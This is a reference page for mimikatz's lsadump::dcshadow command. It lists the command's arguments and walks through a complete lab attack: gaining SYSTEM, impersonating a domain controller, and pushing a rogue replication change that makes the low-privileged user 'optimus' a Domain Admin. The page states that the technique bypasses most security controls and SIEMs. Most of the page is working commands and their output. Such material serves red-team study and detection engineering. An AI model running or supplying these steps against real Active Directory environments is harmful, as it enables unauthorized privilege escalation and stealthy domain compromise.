dcshadow

Search…
dcshadow
lsadump::dcshadow performs a DCShadow attack.
DCShadow is a feature in mimikatz located in the lsadump module. It simulates the behavior of a Domain Controller (using protocols like RPC used only by the DCs) to inject its own data, bypassing most of the common security controls and including many SIEMs. It shares some similarities with the DCSync attack lsadump::dcsync. More information for DCShadow can be found on dcshadow.com.
Command Line argument(s) to run as SYSTEM:
/kill: it is used when you want to delete an object
/object: The Distinguished Name (DN) of the Active Directory object to modify
/domain: the domain to target. The default is the current domain
/dc: the FQDN of the domain controller
/attribute: The name of the Active Directory Schema attribute to modify
/value: the object's value which is depended on the specified attribute
/replOriginatingUsn: The Update Sequence Number​
/multiple: an array of values (specifying multiple values)
/replOriginatingTime: As the name instructs the replication originating time. More info can be found at this guide
/replOriginatingUid: It specifies the UID of the domain controller which performed/requested the change. More info can be found at this guide
Command Line Argument(s) to run in push mode as Domain or Enterprise Admin:
/push: push the changes
/stack: stack the changes and then replicate them all
/schema: The active directory schema partition
/config: The active directory configuration partition
/root: The active directory root
/domain: the domain to target. The default is the current domain
/dc: the FQDN of the domain controller
/computer: The FQDN of the computer to register. The default is the computer on which DCShadow is executed.
/viewstack: View the stack of the changes which are going to be replicated
/clearstack: it clears the stack
/manualregister: it registers the server manually
/manualunregister: It unregisters the server manually
/manualpush: it pushes the changes manually
Escalate a domain user
In the following example the low privileged user hacklab.local\optimus will be added to the "Domain Admins" group:
1
C:\Users>net user optimus /domain
2
User name                    optimus
3
Full Name                    optimus prime
4
Comment                      DCShadow ROCKS
5
User's comment
6
Country/region code          000 (System Default)
7
Account active               Yes
8
Account expires              Never
9
​
10
Password last set            10/31/2021 2:39:23 PM
11
Password expires             Never
12
Password changeable          11/1/2021 2:39:23 PM
13
Password required            Yes
14
User may change password     Yes
15
​
16
Workstations allowed         All
17
Logon script
18
User profile
19
Home directory
20
Last logon                   11/7/2021 3:32:28 PM
21
​
22
Logon hours allowed          All
23
​
24
Local Group Memberships
25
Global Group memberships     *Domain Users
26
The command completed successfully.
Copied!
Obtain debug privileges
From a command line opened as admin, obtain an NT AUTHORITY\SYSTEM privilege.
1
mimikatz # privilege::debug
2
Privilege '20' OK
Copied!
1
mimikatz # token::elevate
2
Token Id  : 0
3
User name :
4
SID name  : NT AUTHORITY\SYSTEM
5
​
6
724     {0;000003e7} 1 D 43713          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
7
 -> Impersonated !
8
 * Process Token : {0;0027cbc0} 2 F 3960324     hacklab\m3g9tr0n        S-1-5-21-2725560159-1428537199-2260736313-1730  (12g,24p)       Primary
9
 * Thread Token  : {0;000003e7} 1 D 28479033    NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)
Copied!
Modify the group id
1
mimikatz # lsadump::dcshadow /object=optimus /attribute=primaryGroupID /value=512
2
** Domain Info **
3
​
4
Domain:         DC=hacklab,DC=local
5
Configuration:  CN=Configuration,DC=hacklab,DC=local
6
Schema:         CN=Schema,CN=Configuration,DC=hacklab,DC=local
7
dsServiceName:  ,CN=Servers,CN=hacklab-site,CN=Sites,CN=Configuration,DC=hacklab,DC=local
8
domainControllerFunctionality: 7 ( WIN2016 )
9
highestCommittedUSN: 80938
10
​
11
** Server Info **
12
​
13
Server: DC.hacklab.local
14
  InstanceId  : {34cb3b05-57f5-4699-b037-5795637d46bf}
15
  InvocationId: {34cb3b05-57f5-4699-b037-5795637d46bf}
16
Fake Server (not already registered): Win10.hacklab.local
17
​
18
** Attributes checking **
19
​
20
#0: primaryGroupID
21
​
22
** Objects **
23
​
24
#0: optimus
25
DN:CN=optimus prime,CN=Users,DC=hacklab,DC=local
26
  primaryGroupID (1.2.840.113556.1.4.98-90062 rev 1):
27
    512
28
    (00020000)
29
​
30
​
31
** Starting server **
32
​
33
 > BindString[0]: ncacn_ip_tcp:Win10[53586]
34
 > RPC bind registered
35
 > RPC Server is waiting!
36
== Press Control+C to stop ==
37
  cMaxObjects : 1000
38
  cMaxBytes   : 0x00a00000
39
  ulExtendedOp: 0
40
  pNC->Guid: {9901d757-a63d-478f-a96a-f8be1a8308ac}
41
  pNC->Sid : S-1-5-21-2725560159-1428537199-2260736313
42
  pNC->Name: DC=hacklab,DC=local
43
SessionKey: c6aba9b6a2391d12b5f5b9b8c7cbf8d3cf0070202997d47aff1f96004638b815
44
1 object(s) pushed
45
 > RPC bind unregistered
46
 > stopping RPC server
47
 > RPC server stopped
Copied!
Push the changes
To push the changes a second CMD with Domain or Enterprise Admin privileges must be opened:
1
mimikatz # lsadump::dcshadow /push
2
** Domain Info **
3
​
4
Domain:         DC=hacklab,DC=local
5
Configuration:  CN=Configuration,DC=hacklab,DC=local
6
Schema:         CN=Schema,CN=Configuration,DC=hacklab,DC=local
7
dsServiceName:  ,CN=Servers,CN=hacklab-site,CN=Sites,CN=Configuration,DC=hacklab,DC=local
8
domainControllerFunctionality: 7 ( WIN2016 )
9
highestCommittedUSN: 80939
10
​
11
** Server Info **
12
​
13
Server: DC.hacklab.local
14
  InstanceId  : {34cb3b05-57f5-4699-b037-5795637d46bf}
15
  InvocationId: {34cb3b05-57f5-4699-b037-5795637d46bf}
16
Fake Server (not already registered): Win10.hacklab.local
17
​
18
** Performing Registration **
19
​
20
** Performing Push **
21
​
22
Syncing DC=hacklab,DC=local
23
Sync Done
24
​
25
** Performing Unregistration **
Copied!
After the successful pushing the user is now part of the "Domain Admins":
1
C:\Users\Administrator\Desktop\x64>net user optimus /domain
2
User name                    optimus
3
Full Name                    optimus prime
4
Comment                      DCShadow ROCKS
5
User's comment
6
Country/region code          000 (System Default)
7
Account active               Yes
8
Account expires              Never
9
​
10
Password last set            10/31/2021 2:39:23 PM
11
Password expires             Never
12
Password changeable          11/1/2021 2:39:23 PM
13
Password required            Yes
14
User may change password     Yes
15
​
16
Workstations allowed         All
17
Logon script
18
User profile
19
Home directory
20
Last logon                   11/7/2021 3:32:28 PM
21
​
22
Logon hours allowed          All
23
​
24
Local Group Memberships
25
Global Group memberships     *Domain Admins
26
The command completed successfully.
Copied!
changentlm
dcsync
Last modified 6mo ago
Copy link
Contents
Escalate a domain user
Obtain debug privileges
Modify the group id
Push the changes